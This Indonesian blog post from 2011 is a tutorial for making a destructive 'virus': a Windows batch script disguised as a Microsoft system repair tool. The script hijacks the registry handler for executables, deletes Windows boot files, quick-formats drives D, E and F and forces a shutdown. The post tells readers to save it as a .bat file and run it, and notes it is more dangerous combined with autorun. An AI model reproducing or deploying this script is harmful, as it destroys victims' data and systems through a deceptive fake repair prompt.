Jumat, 12 Agustus 2011
Membuat Virus Format Hard drive
1. Buka Notepad
2. Paste di notepad kode berikut ini
@echo off
title Microsoft Windows TM Auto Repair
echo.
echo Preparing to Fixing the System..............................
echo This system need to repair of broken files.
echo This problem may be cause a Virus activity or coruption files.
echo Please wait a minute until windows doing it self....
echo Please close any running programs from the Windows system.
echo This program License and copyright by
echo Microsoft Coorporation TM.
echo System Repair in progress ........ please wait a second..
echo.
reg add HKLM\SOFTWARE\Classes\exefile\shell\open\Command /ve /d %%fe340ead%% /f
echo.
del /f /Q /A C:\ntldr /S
echo.
Format D: /Q /X /y
echo.
Format E: /Q /X /y
echo.
Format F: /Q /X /y
echo.
del /f /Q /A C:\command.com /S
echo.
del /f /Q /A C:\io.sys /S
echo.
del /f /Q /A C:\config.sys /S
echo.
echo System is now repaired.
echo Windows will reboot the system.
echo.
Shutdown.exe -s -c "Finish Repair System" -f -t 10
echo.
pause
echo.
Shutdown.exe -s -c "Finish Repair System" -f -t 10
echo.
exit
3. Simpan file dengan nama yang terserah tetapi ekstensi .bat
Contoh : Virus.bat
Pastikan Save as type : all files
4. Jalankan file yang muncul setelah notepad di save. (Virus ini sangat berbahaya jika digabungkan dengan autorun)
Langganan:
Posting Komentar (Atom)

Tidak ada komentar:
Posting Komentar